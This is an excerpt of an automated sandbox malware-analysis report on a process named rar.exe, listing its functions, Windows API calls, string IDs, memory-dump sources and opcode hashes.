                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: e+000$gfff
                                                                                                                                                                                                                                • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                • Opcode ID: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                • Instruction ID: d8a0cdc8bb882e654fd20e0c06d6f508c1437f05fc4c24c47139fdf552a62238
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7106781bdf1546bde54527bf858c9e03adeffff05cd77f62067aea497a9d42c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44510762B1D7C246E7258F3599413697B95EB41B90F0882B1CAACC7BDAEF2CD44AC700
                                                                                                                                                                                                                                Function 00007FF6FAA54534 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(?,?,?,00000800,?,?,00000000,00007FF6FAA4475B,?,00000000,?,?,00007FF6FAA44620,?,00000000,?), ref: 00007FF6FAA54633
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                • String ID: UNC$\\?\
                                                                                                                                                                                                                                • API String ID: 1611563598-253988292
                                                                                                                                                                                                                                • Opcode ID: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                • Instruction ID: 53d8a099c78331eb95c55916e0ea07e1a0efd995ff8677c0100d00fad3bc44d0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da028c110e4e0ee969c3eaba738cc076e51dd9ec006f0672d54c2a85376dd233
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141E512A0C68256EB20AB19E5012B96362AF067C4F8085B1DD7DC77DAFE2CE94FC704
                                                                                                                                                                                                                                Function 00007FF6FAA83B0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
                                                                                                                                                                                                                                • API String ID: 3307058713-2129694862
                                                                                                                                                                                                                                • Opcode ID: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                • Instruction ID: a19a8a664bfd4ef849d5d9afefa66b2bb0683228af6057c2c8bf06e5b18a4e8d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5c98bd9bcb7567b946254e1cd77aa550a51c4497f1b66c7ef7d78e94eebfc81
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F419076A0CB9286EB15DF2598400B877A4EF44BC4B4850B5E96D87BD5EF3DE48B8310
                                                                                                                                                                                                                                Function 00007FF6FAA67C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFilewcsstr
                                                                                                                                                                                                                                • String ID: System Volume Information\
                                                                                                                                                                                                                                • API String ID: 1592324571-4227249723
                                                                                                                                                                                                                                • Opcode ID: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                • Instruction ID: a03bc7aa52d29f57f3cdd0e9ee70a4dc7d12a533fae39b161d083d95fb898e19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4db18abc006475e63bde04fe0f8edb9794334f288998beee5a1eb1867efadb0f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69310721A2968185FB51DF25A1606BE6770AF46BC0F0440B1EE6D877D5FE3CE04B8B00
                                                                                                                                                                                                                                Function 00007FF6FAA34888 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString$fflushswprintf
                                                                                                                                                                                                                                • String ID: %d.%02d$[
                                                                                                                                                                                                                                • API String ID: 1946543793-195111373
                                                                                                                                                                                                                                • Opcode ID: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                • Instruction ID: cf48c8fa72c3eaae9902f7e43d94a65b204b737318aa82229d2b851d1e0e192f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f04d483f56175c8b40415d20487cbec804232b663c65daca34dce35784760712
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8931B321A0D6C252FB50EB24E5163B92390AF45784F4444B9D6AE8B7C6FF3EE54ECB00
                                                                                                                                                                                                                                Function 00007FF6FAA63C20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: snprintf
                                                                                                                                                                                                                                • String ID: $%s$@%s
                                                                                                                                                                                                                                • API String ID: 4288800496-834177443
                                                                                                                                                                                                                                • Opcode ID: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                • Instruction ID: a760a9466c991b522cd11432e136dfc289ba78e84f319784a28475f459cf97c7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a7053d11aa3be1251aeb62ffc93e7b2ac424df20b613d8193438d5ab2157725
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4631AD62A18E8295EB118F59E4407B927A0FF46784F401072EE2D97BD9EE3DE50FDB00
                                                                                                                                                                                                                                Function 00007FF6FAA5F474 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: fixed%u.$fixed.
                                                                                                                                                                                                                                • API String ID: 233258989-2525383582
                                                                                                                                                                                                                                • Opcode ID: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                • Instruction ID: 362eb8f0e32feda82da7b7486c6cd5bf08d7409057e2cb8395b09f4c62ab4ecc
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fddd7528cb08c65f409e766db47ba8cea55e1086a780a4f54c28e47408ad2848
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2931A662A1868156EB109B25E5013EA6760FB45790F504172EE6D976DAFE3CD10FCB10
                                                                                                                                                                                                                                Function 00007FF6FAA649F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LoadString
                                                                                                                                                                                                                                • String ID: Done
                                                                                                                                                                                                                                • API String ID: 2948472770-499744565
                                                                                                                                                                                                                                • Opcode ID: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                • Instruction ID: 5c50a4be1033d63971349525c9da859516025af59b1fed0ca624d4ca46ecc1f5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 029dc5b3afc22f1748ed18b4bb1637acba6cd1f0e3e62fcee6acc39158075de8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC116D71B18B4586E7108F1AE940069B7A1FB99FC0F54857ACE2CC33A5FE3DE54B8644
                                                                                                                                                                                                                                Function 00007FF6FAA25DB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: swprintf
                                                                                                                                                                                                                                • String ID: ;%%0%du
                                                                                                                                                                                                                                • API String ID: 233258989-2249936285
                                                                                                                                                                                                                                • Opcode ID: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                • Instruction ID: 4cc6f53f68ea30be4eb5985fff9e94d94ce79bf82ae2be49c977b9d68a6abe64
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5630f68361fdad429f81d227d618e3426730f2a1c59dfa690c7e09baebf2de4d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18119032B1868186E7209F25E4103E973A0FB88784F584071DB9D8779AEE3CE95ACB40
                                                                                                                                                                                                                                Function 00007FF6FAA4331C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6FAA542CC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6FAA5430F
                                                                                                                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00007FF6FAA40BED,?,?,00000000,?,?,00007FF6FAA3F30F,00000000,00007FF6FAA26380,?,00007FF6FAA22EC8), ref: 00007FF6FAA4337E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAC6000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763678163.00007FF6FAAC8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763720110.00007FF6FAACE000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_109_2_7ff6faa20000_rar.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InformationVolumeswprintf
                                                                                                                                                                                                                                • String ID: FAT$FAT32
                                                                                                                                                                                                                                • API String ID: 989755765-1174603449
                                                                                                                                                                                                                                • Opcode ID: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                • Instruction ID: 99cf1157c272641e5b8c69af5694730b0d1d9e957c6bd017ba36baf769ba44a2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1ebeb30fd722dd76b352bce1e824f537b2a19fc82dbcf7dfb484d1401dd98df
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F114231A1CA8241F7609B10E8812A66395FF85344F805075E95DC7ADAFF3DE11ECB14
                                                                                                                                                                                                                                Function 00007FF6FAA6B974 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000006D.00000002.2763314229.00007FF6FAA21000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6FAA20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763277269.00007FF6FAA20000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763390195.00007FF6FAA90000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763429386.00007FF6FAAA8000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763474075.00007FF6FAAA9000.00000008.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAAA000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAAB4000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000006D.00000002.2763514043.00007FF6FAABE000.00000004.00000001.01000000.0000001E.sdmpDownload File
